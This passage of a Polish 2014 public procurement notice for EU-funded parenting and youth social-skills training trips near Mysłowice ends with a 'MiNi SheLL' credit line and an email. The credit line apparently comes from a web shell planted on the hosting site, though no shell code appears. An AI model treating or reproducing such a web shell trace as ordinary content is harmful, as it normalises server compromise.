3. W drodze powrotnej - na czas podróży, Wykonawca zapewni każdemu uczestnikowi wyjazdu napoje na drogę (np. woda mineralna, soki w ilości 0,5 l/osobę). 
Czas wolny: 
W czasie wolnym od zajęć należy zapewnić uczestnikom  oraz ich dzieciom efektywną i atrakcyjną organizację czasu wolnego. Wykonawca winien zapewnić co najmniej 2 formy organizacji czasu wolnego (w tym wycieczkę po okolicy), w szczególności wykorzystując dostępność miejscowych atrakcji takich jak źródła termalne, skanseny dawnej zabudowy, obiekty muzealne (stałe i czasowe ekspozycje), parki krajobrazowe  itp. W przypadku, gdy proponowana animacja znajduje się poza obiektem, Wykonawca zapewni transport autokarem tam i z powrotem. 
Wymagania dodatkowe: 
1. Wykonawca winien ubezpieczyć wszystkich uczestników wyjazdu od następstw nieszczęśliwych wypadków na okres od dnia rozpoczęcia realizacji przedmiotu zamówienia do dnia jego zakończenia.  
2. Wykonawca zapewni oznakowanie pomieszczeń, w których będą odbywały się zajęcia zgodnie z aktualnymi wytycznymi Ministra Infrastruktury i Rozwoju w zakresie informacji i promocji Programu Operacyjnego Kapitał Ludzki, a także zamieszczenie znaków: logo Kapitał Ludzki Narodowa Strategia Spójności, logo Unii Europejskiej z Europejskim Funduszem Społecznym oraz umieszczenie informacji o współfinansowaniu zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Odpowiednie oznakowanie winno znaleźć się również na dokumentach związanych z realizacja warsztatów oraz materiałach przekazywanych uczestnikom warsztatów.
3. Wykonawca zrealizuje dokumentację fotograficzną szkolenia (na płycie CD).
Zajęcia szkoleniowe, zakwaterowanie, wyżywienie oraz sprawowanie opieki nad dziećmi Wykonawca winien zapewnić w obrębie jednego obiektu. 
Pod uwagę brane będą następujące czynniki: program (szkolenia, 2 propozycje na spędzanie czasu po zajęciach oraz animacji dla dzieci), cena, lokalizacja - miejsce oraz warunki szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. program - 30</li>
<li>3. lokalizacja - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Trening kompetencji rodzicielskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 16 osób dorosłych - uczestników/uczestniczek projektu 
Liczba dzieci wymagających opieki podczas zajęć ich rodzica: 21 (w wieku od 1 r.ż do 10 lat); 
9-cioro w wieku 1-3 lata; 5-cioro w wieku 4-6 lat (w tym 5-latek z niepełnosprawnością ruchową poruszający się na wózku inwalidzkim); 7-mioro w wieku 8-10 lat 
Czas trwania: 6 dni (5 noclegów) w terminie: 4.07- 7.08.2014 r. z wyjątkiem terminu 12-25.07.2014 (pobyt powinien rozpocząć się i zakończyć obiadem)
Liczba godzin zajęć w formie warsztatów: 35 godzin lekcyjnych  na osobę (6 dni)
Zakres tematyczny usługi przewidzianej do wykonania w szczególności obejmuje:  
1)	Autodiagnozę  uczestnika jako rodzica (mocne i słabe strony w procesie wychowawczym, wizerunek w oczach dziecka)
2)	Postawy i zachowania dorosłych oraz ich konsekwencje (najczęściej popełniane błędy wychowawcze)
3)	Diagnozę własnego dziecka (zasoby i ograniczenia, potrzeby, pozycja w grupie rówieśniczej)
4)	Charakterystykę rozwoju dziecka w różnych okresach życia - adekwatne zachowania rodziców 
5)	Komunikowanie się z dziećmi (stawianie granic/wymagań, wzmacnianie poczucia własnej wartości u dzieci)
6)	Stymulowanie rozwoju dziecka (animacja czasu wolnego, pomoc w nauce)
7)	Przeciwdziałanie zachowaniom agresywnym u dzieci, wagarom, uzależnieniom
Cel szkolenia: Podniesienie kompetencji rodzicielskich/wychowawczych uczestników projektu (szczególnie w w/w zakresach). Osiągnięcie celu  należy udokumentować wykorzystując odpowiednie narzędzia pomiaru efektywności szkolenia (kwestionariusze ankiet, testy itp.)
Materiały dydaktyczne i inne: Wykonawca w celu realizacji przedmiotu zamówienia zapewni optymalną ilość materiałów niezbędnych do przeprowadzenia spotkań (np. podręcznik w wydaniu książkowym o treści zgodnej z tematyką spotkań, zeszyt min. 60 kartkowy, ołówek, długopis, teczka na materiały szkoleniowe). 
Opieka nad uczestnikami: Wykonawca zapewni ze swej strony koordynatora działań pobytu odpowiedzialnego za: zbiórkę, dowóz uczestników wyjazdu tam i z powrotem, zapewnienie bezpieczeństwa, organizację zajęć szkoleniowych oraz czasu wolnego i wypoczynku. 
Opieka nad dziećmi: 
1. Wykonawca na czas nieobecności osób dorosłych (odbywających zajęcia w ramach nin. zamówienia) winien zapewnić opiekę nad małoletnimi dziećmi dostosowaną do wieku dzieci i ich potrzeb sprawowaną przez doświadczoną kadrę (min. 4 opiekunki)
2. Wykonawca winien zapewnić co najmniej 2 propozycje animacji dla dzieci, także podczas niesprzyjających warunków atmosferycznych (w szczególności: zabawy ruchowe na powietrzu, spacer po okolicy z możliwością zwiedzenia miejscowych atrakcji, kino, przejście na miejscowy plac zabaw, zajęcia plastyczno-ruchowe na terenie Ośrodka itp). 
Zakwaterowanie: 
1. Obiekt (min. 3 gwiazdki) z udogodnieniami dla osób niepełnosprawnych powinien: mieścić się w miejscowości atrakcyjnej pod względem turystycznym, oddalonej do 200km od siedziby zamawiającego, posiadać salę szkoleniową, dysponować salą gimnastyczną, siłownią. 
2. Wykonawca zapewni uczestnikom zakwaterowanie w pokojach 2-3 osobowych z pełnym węzłem sanitarnym (tj. umywalką, WC, prysznicem z ciepłą i zimną wodą), wyposażonych w łóżka jednoosobowe, stolik, krzesła oraz szafki na odzież a także z dostępem do TV.  Uczestnicy zostaną zakwaterowani w sposób uwzględniający płeć lub rodzinę (rodzic z dziećmi), a w przypadku nieparzystej liczby osób zapewniony zostanie pokój jednoosobowy lub dwuosobowy do pojedynczego wykorzystania. Rodzicowi z niepełnosprawnym dzieckiem - zostanie udostępniony pokój przystosowany do specjalnych potrzeb dziecka i pozbawiony barier technicznych.
3.Wykonawca zapewni dostępność wody mineralnej w pokojach w ilości 1,5 l dziennie/osobę dorosłą. 
Wyżywienie: 
1. Wykonawca zapewni w cenie usługi pełne i urozmaicone wyżywienie polegające na przygotowaniu i zaserwowaniu 3 posiłków dziennie (za wyjątkiem dnia przyjazdu i wyjazdu) na każdego uczestnika wyjazdu  w postaci: śniadania w formie szwedzkiego stołu, dwudaniowego obiadu (z porcją mięsa lub ryby) z deserem i napojem oraz kolacji. Zamawiający nie dopuszcza możliwości serwowania ciepłego obiadu w formie dań gotowych typu fast-food oraz gotowych zup typu instant. Ponadto wykonawca winien uwzględnić potrzeby żywieniowe dzieci zapewniając rodzicom na ich życzenie dostęp do takich produktów żywnościowych jak np. gorące mleko, płatki śniadaniowe, czekolada lub kakao w proszku (w szczególności podczas śniadania i kolacji).
2. W trakcie odbywania zajęć warsztatowych Wykonawca zapewni codziennie uczestnikom poczęstunek w postaci: dobrej jakości kawy i herbaty (bez ograniczeń), mieszanych drobnych artykułów spożywczych (np. paluszki, krakersy, kruche ciasteczka, babeczki, rurki w ilości min. 100 g/osobę), zimnych napojów (np. woda mineralna, soki w ilości 0,5 l/osobę) oraz dodatków takich jak: cukier, mleczko, cytryna. W trakcie sprawowania opieki nad dziećmi, Wykonawca winien zaplanować przerwy w zajęciach animacyjnych, podczas których dzieci będą mogły spożyć drobną przekąskę składającą się z zestawu: np. drożdżówka/pączek/porcja owoców sezonowych oraz napoju np. woda mineralna, soki w ilości 0,5 l/dziecko. 
Transport: 
1. Wykonawca zapewni w cenie usługi transport uczestników (z dziećmi)  i ich bagażu na miejsce wykonywania usługi i z powrotem - pojazdem z ilością miejsc pozwalającą na komfortowe, swobodne podróżowanie zgłoszonej do wyjazdu grupie uczestników, sprawnym technicznie, dopuszczonym do ruchu drogowego. 
2. Miejsce wyjazdu i powrotu uczestników/uczestniczek wskaże Zamawiający (na terenie gminy Mysłowice). 
3. W drodze powrotnej - na czas podróży, Wykonawca zapewni każdemu uczestnikowi wyjazdu napoje na drogę (np. woda mineralna, soki w ilości 0,5 l/osobę). 
Czas wolny: 
W czasie wolnym od zajęć należy zapewnić uczestnikom oraz ich dzieciom efektywną i atrakcyjną organizację czasu wolnego (uwzględniając możliwości dziecka niepełnosprawnego). Wykonawca winien zapewnić co najmniej 2 formy organizacji czasu wolnego (w tym wycieczkę po okolicy), w szczególności wykorzystując dostępność miejscowych atrakcji takich jak źródła termalne, skanseny dawnej zabudowy, obiekty muzealne (stałe i czasowe ekspozycje), parki krajobrazowe  itp. W przypadku, gdy proponowana animacja znajduje się poza obiektem, Wykonawca zapewni transport autokarem tam i z powrotem. 
Wymagania dodatkowe: 
1. Wykonawca winien ubezpieczyć wszystkich uczestników wyjazdu od następstw nieszczęśliwych wypadków na okres od dnia rozpoczęcia realizacji przedmiotu zamówienia do dnia jego zakończenia.  
2. Wykonawca zapewni oznakowanie pomieszczeń, w których będą odbywały się zajęcia zgodnie z aktualnymi wytycznymi Ministra Infrastruktury i Rozwoju w zakresie informacji i promocji Programu Operacyjnego Kapitał Ludzki, a także zamieszczenie znaków: logo Kapitał Ludzki Narodowa Strategia Spójności, logo Unii Europejskiej z Europejskim Funduszem Społecznym oraz umieszczenie informacji o współfinansowaniu zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Odpowiednie oznakowanie winno znaleźć się również na dokumentach związanych z realizacja warsztatów oraz materiałach przekazywanych uczestnikom warsztatów.
3. Wykonawca zrealizuje dokumentację fotograficzną szkolenia (na płycie CD).
Zajęcia szkoleniowe, zakwaterowanie, wyżywienie oraz sprawowanie opieki nad dziećmi Wykonawca winien zapewnić w obrębie jednego obiektu. 
Pod uwagę brane będą następujące czynniki: program (szkolenia, 2 propozycje na spędzanie czasu po zajęciach oraz animacji dla dzieci), cena, lokalizacja - miejsce oraz warunki szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. program - 30</li>
<li>3. lokalizacja - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Trening umiejętności  społecznych z elementami planowania rodziny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 10 osób (młodzież w wieku 15-18 lat) - uczestników/uczestniczek projektu  
Czas  trwania:  6 dni  (5 noclegów) w terminie:  18-30.08.2014 r. (pobyt powinien rozpocząć się 
i zakończyć obiadem)
Liczba godzin zajęć w formie warsztatów: 35 godzin lekcyjnych  na osobę (6 dni) 
Zakres tematyczny usługi przewidzianej do wykonania w szczególności obejmuje:  
	1) komunikację interpersonalną i asertywność w kontaktach międzyludzkich
	2) przyczyny stresu i jego niwelowanie
	3) zarządzanie konfliktem i efektywne rozwiązywanie konfliktów
	4) zagadnienia rodziny i jej funkcji
	5) rozwój psychoseksualny, higienę okresu dojrzewania 
	6) odpowiedzialne zachowania w sferze płciowości - profilaktykę (przed)wczesnego macierzyństwa oraz chorób przenoszonych drogą płciową, pornografii
	7) uzależnienia (Internet, środki psychoaktywne) 
Cel szkolenia: Nabycie umiejętności  społecznych związanych m.in. z planowaniem rodziny. Osiągnięcie celu należy udokumentować wykorzystując odpowiednie narzędzia pomiaru efektywności szkolenia (kwestionariusze ankiet, testy itp.) 
Materiały dydaktyczne i inne: Wykonawca w celu realizacji przedmiotu zamówienia zapewni optymalną ilość materiałów niezbędnych do przeprowadzenia spotkań (np. podręcznik w wydaniu książkowym o treści zgodnej z tematyką spotkań, zeszyt min. 60 kartkowy, ołówek, długopis, teczka na materiały szkoleniowe).
Opieka nad uczestnikami: Wykonawca zapewni ze swej strony osobę szkolącą, opiekuna - również na czas podróży - w tym koordynatora działań pobytu odpowiedzialnego za: zbiórkę, dowóz uczestników wyjazdu tam i z powrotem, zapewnienie bezpieczeństwa, organizację zajęć oraz czasu wolnego i wypoczynku. 
Zakwaterowanie: 
1. Obiekt (min.3 gwiazdki) powinien: mieścić się  w miejscowości atrakcyjnej pod względem turystycznym, oddalonej do 200km od siedziby zamawiającego, posiadać salę szkoleniową, dysponować  salą gimnastyczną, siłownią. 
2. Wykonawca zapewni uczestnikom zakwaterowanie w pokojach 2-4 osobowych z pełnym węzłem sanitarnym (tj. umywalką, WC, prysznicem z ciepłą i zimną wodą) wyposażonych w łóżka jednoosobowe, stolik, krzesła oraz szafki na odzież, z dostępem do TV. Uczestnicy zostaną zakwaterowani w sposób uwzględniający płeć, a w przypadku nieparzystej liczby osób zapewniony zostanie pokój jednoosobowy lub dwuosobowy do pojedynczego wykorzystania. 
3.  Wykonawca zapewni dostępność wody mineralnej w pokojach w ilości 1,5 l dziennie/osobę. 
Wyżywienie: 
1.Wykonawca zapewni w cenie usługi pełne i urozmaicone wyżywienie polegające na przygotowaniu i zaserwowaniu 3 posiłków dziennie (za wyjątkiem dnia przyjazdu i wyjazdu) na każdego uczestnika wyjazdu  w postaci: śniadania w formie szwedzkiego stołu, dwudaniowego obiadu(z porcją mięsa lub ryby) z deserem i napojem oraz  kolacji. Zamawiający nie dopuszcza możliwości serwowania ciepłego obiadu w formie dań gotowych typu fast-food oraz gotowych zup typu instant.


2. W trakcie odbywania zajęć warsztatowych Wykonawca zapewni codziennie uczestnikom poczęstunek w postaci: dobrej jakości kawy i herbaty (bez ograniczeń), mieszanych drobnych artykułów spożywczych (np. paluszki, krakersy, kruche ciasteczka, babeczki, rurki w ilości min. 100 g/osobę), zimnych napojów (np. woda mineralna, soki w ilości 0,5 l/osobę) oraz dodatki takie jak: cukier, mleczko, cytryna. 
Transport: 
1. Wykonawca zapewni w cenie usługi transport uczestników i ich bagażu na miejsce wykonywania usługi i z powrotem - pojazdem z ilością miejsc pozwalającą na komfortowe, swobodne podróżowanie zgłoszonej do wyjazdu grupie uczestników, sprawnym technicznie, dopuszczonym do ruchu drogowego. 
2. Miejsce wyjazdu i powrotu uczestników/uczestniczek wskaże Zamawiający (na terenie gminy Mysłowice). 
3. W drodze powrotnej - na czas podróży, Wykonawca zapewni każdemu uczestnikowi wyjazdu napoje na drogę (np. woda mineralna, soki w ilości 0,5 l/osobę). 
Czas wolny: 
W czasie wolnym od zajęć należy zapewnić uczestnikom efektywną i atrakcyjną organizację czasu wolnego. Wykonawca winien zapewnić co najmniej 3 formy organizacji czasu wolnego (w tym wycieczkę po okolicy), w szczególności wykorzystując dostępność miejscowych atrakcji takich jak źródła termalne, skanseny dawnej zabudowy, obiekty muzealne (stałe i czasowe ekspozycje), parki krajobrazowe  itp. W przypadku, gdy proponowana animacja znajduje się poza obiektem, Wykonawca zapewni transport autokarem tam i z powrotem. 
Wymagania dodatkowe: 
1. Wykonawca winien ubezpieczyć wszystkich uczestników wyjazdu od następstw nieszczęśliwych wypadków na okres od dnia rozpoczęcia realizacji przedmiotu zamówienia do dnia jego zakończenia.  
2. Wykonawca zapewni oznakowanie pomieszczeń, w których będą odbywały się zajęcia zgodnie z aktualnymi wytycznymi Ministra Infrastruktury i Rozwoju w zakresie informacji i promocji Programu Operacyjnego Kapitał Ludzki, a także zamieszczenie znaków: logo Kapitał Ludzki Narodowa Strategia Spójności, logo Unii Europejskiej z Europejskim Funduszem Społecznym oraz umieszczenie informacji o współfinansowaniu zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Odpowiednie oznakowanie winno znaleźć się również na dokumentach związanych z realizacja warsztatów oraz materiałach przekazywanych uczestnikom warsztatów.
3. Wykonawca zrealizuje dokumentację fotograficzną szkolenia (na płycie CD).
Zajęcia szkoleniowe, zakwaterowanie oraz wyżywienie dla uczestników Wykonawca winien zapewnić w obrębie jednego obiektu. 
Pod uwagę brane będą następujące czynniki: program (szkolenia oraz 3 propozycje na spędzanie czasu po zajęciach), cena, lokalizacja - miejsce oraz warunki szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 18.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. program - 30</li>
<li>3. lokalizacja - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com